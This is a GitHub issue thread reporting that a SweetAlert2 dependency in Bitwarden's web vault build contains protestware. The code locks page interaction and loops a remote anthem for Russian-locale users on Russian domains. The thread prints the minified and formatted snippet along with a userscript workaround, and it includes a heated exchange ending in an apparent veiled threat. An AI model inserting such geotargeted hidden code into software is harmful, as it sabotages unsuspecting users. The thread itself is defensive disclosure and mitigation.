Closed DarkCat09 closed 1 year ago
I've read the conversation in https://github.com/bitwarden/clients/pull/5011 and the related issue https://github.com/bitwarden/clients/issues/4540, and now I don't think that developers will do anything...
Hi @DarkCat09,
This has been escalated for further investigation. If you have more information that can help us, please add it below.
Thanks!
.ru, .su, and .рф domain zones and playing Ukrainian national anthem
@atjbramley,
Thanks for your quick response.
If you are not going to use another JavaScript library, take a look at https://github.com/lofcz/sweetalert2-neutral
Hi @DarkCat09,
I've looked into the issue, and Bitwarden does not use a vulnerable version of SweetAlert2. We've intentionally not upgraded to newer major versions to avoid this issue.
I took a quick look at VaultWarden's build process, and they run npm audit --fix, which seems to bump SweetAlert2 to a new major version. Since Bitwarden does not provide support for unofficial builds, this issue will be closed.
@Hinton,
Really? I've checked the latest web vault release now:
$ wget https://github.com/bitwarden/clients/releases/download/web-v2023.5.1/web-2023.5.1-selfhosted-open-source.zip
...
2023-07-06 12:02:55 (101 KB/s) - «web-2023.5.1-selfhosted-open-source.zip» saved [10593568/10593568]
$ 7z x web-2023.5.1-selfhosted-open-source.zip
7-Zip [64] 17.04 : Copyright (c) 1999-2021 Igor Pavlov : 2017-08-28
p7zip Version 17.04 (locale=ru_RU.UTF-8,Utf16=on,HugeFiles=on,64 bits,12 CPUs x64)
Scanning the drive for archives:
1 file, 10593568 bytes (11 MiB)
Extracting archive: web-2023.5.1-selfhosted-open-source.zip
--
Path = web-2023.5.1-selfhosted-open-source.zip
Type = zip
Physical Size = 10593568
Everything is Ok
Folders: 75
Files: 226
Size: 41831531
Compressed: 10593568
$ cd build
$ grep -ior ukraina.mp3 .
./app/vendor.d6556a6abd8a862bb28c.js.map:Ukraina.mp3
./app/vendor.d6556a6abd8a862bb28c.js:Ukraina.mp3
$ more ./app/vendor.d6556a6abd8a862bb28c.js
/Ukraina.mp3 (slash is the "find" command in more)
if("undefined"!=typeof window&&/^ru\b/.test(navigator.language)&&location.host.match(/\.(ru|su|xn--p1ai)$/)){var pi=new Date,mi=localStorage.getItem("swal-initiation");mi?(pi.getTime()-Date.parse(mi))/864e5>3&&setTimeout((function(){document.body.style.pointerEvents="none";var e=document.createElement("audio");e.src="https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",e.loop=!0,document.body.appendChild(e),setTimeout((function(){e.play().catch((function(){}))}),2500)}),500)
Maybe your CI/CD system also updates packages?
Here is the SHA256 sum of the release file I downloaded:
d918f0f8cbddc398353dddaac7821322fba4f33c722c8821a8c9132e6df53f57 web-2023.5.1-selfhosted-open-source.zip
SweetAlert2 10.16.1 specified in package.json was released before 24.02.2022, so there should be no malicious code. But there is (at least, in the pre-built web vault).
GitHub Actions build-web config:
Build command in apps/web/package.json:
That's weird. Where does CI update packages?
I took a second look and you are right, it seems the dependency was updated to a newer patch release recently which seems to bring in this issue. We're partially in the process of replacing SweetAlert2 with our own dialogs already though.
Any progress on fixing this vulnerability?
@Hinton, I'm sorry to bother you, but could I ask if there is any progress?
I still see swal2 in package(-lock).json, and grep still finds "ukraina.mp3" in the latest web vault build.
If rewriting the UI to custom dialogs takes much time, why not use npm i sweetalert2-neutral for now?
I moved to KeePassXC + Syncthing, because I didn't want to wait for the fix and realized that serverless password storage is more secure. But I just want to be sure that Bitwarden supports neither Ukraine nor Russia, so I'll be glad to hear about updates on removing sweetalert2.
Upd: thanks a lot for reacting. I've subscribed to PR discussion.
It has taken 2 months to remove MIR options (request: https://github.com/bitwarden/clients/pull/5011 and PR: https://github.com/bitwarden/clients/issues/4540); 2 months have passed for this issue to remove the Ukraine anthem 🤞🏼
@DarkCat09 Thank you for digging into this Andrey! :3
Here's the formatted version of the snippet in question as of v2023.5.1:
if ("undefined" != typeof window && /^ru\b/.test(navigator.language) && location.host.match(/\.(ru|su|xn--p1ai)$/)) {
var pi = new Date,
mi = localStorage.getItem("swal-initiation");
// If more than three days (864e5 ms is one day) have passed since SweetAlert2 first saw the origin...
// https://developer.mozilla.org/docs/Glossary/Origin
mi ? (pi.getTime() - Date.parse(mi)) / 864e5 > 3 && setTimeout((function() {
document.body.style.pointerEvents = "none";
var e = document.createElement("audio");
e.src = "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3",
e.loop = !0,
document.body.appendChild(e), setTimeout((function() {
e.play().catch((function() {}))
}), 2500)
}), 500) : /* ... */ null
}
Compare to: https://github.com/sweetalert2/sweetalert2/blob/v11.6.13/src/SweetAlert.js#L261-L281
Gist: https://gist.github.com/yanalunaterra/1adaf6173f13875cbd49303009f4ef31
Does it mean that the workaround is to block the flag-gimn.ru domain completely and ignore console errors and missing alerts?
@sguryev, also, you need to start a script that reverses pointerEvents = "none", i.e.
window.addEventListener('load', () => { document.body.style.pointerEvents = "auto" })
But I hope this will be fixed soon.
@sguryev Try:
// ==UserScript==
// @name SweetAlert2 protestware workaround
// @version 1
// @match *://*.ru/*
// @match *://*.su/*
// @match *://*.by/*
// @match *://*.xn--p1ai/*
// ==/UserScript==
// Tested against v11.7.27:
// https://github.com/sweetalert2/sweetalert2/blob/v11.7.27/src/SweetAlert.js#L261-L285
const observer = new MutationObserver(function(records, _) {
for (const record of records) {
for (const node of record.addedNodes) {
if (node.src === "https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3") {
document.body.style.removeProperty("pointer-events");
node.pause();
node.src = "";
node.remove();
}
}
}
});
observer.observe(document.body, { childList: true });
Here's how to use it: https://github.com/awesome-scripts/awesome-userscripts#how-to-use
(;
We're in the final stages of getting this dependency fully removed for the September release.
Thank you for years of using my small plugin ❤️ and apologies for bringing this hassle to your project.
I hope to see one day that Bitwarden Inc. stands with Ukraine (something similar to this). Not restricting your service to ruzzians might negatively affect the reputation of the business.
Sincerely, happy Bitwarden user, this repo contributor, and the author of @sweetalert2
@limonte
Not restricting your service to ruzzians might negatively affect the reputation of the business.
Is that a threat?
Not restricting your service to ruzzians might negatively affect the reputation of the business.
Look around when you walk in the evenings.
Steps To Reproduce
SweetAlert2 loads the Ukrainian anthem if the browser language is set to Russian or the web vault is hosted on a RU/РФ domain.
It is used as dependency: https://github.com/bitwarden/clients/blob/master/package.json#L198
See also https://github.com/dani-garcia/bw_web_builds/issues/132
I've downloaded the latest release of web vault and checked with grep:
Expected Result
Expected Result: no politics.
Actual Result
Actual Result: an error while loading the Ukrainian anthem in the DevTools console.
Screenshots or Videos
No response
Additional Context
No response
Operating System
Linux
Operating System Version
No response
Web Browser
Firefox
Browser Version
No response
Build Version
v2023.5.1
Issue Tracking Info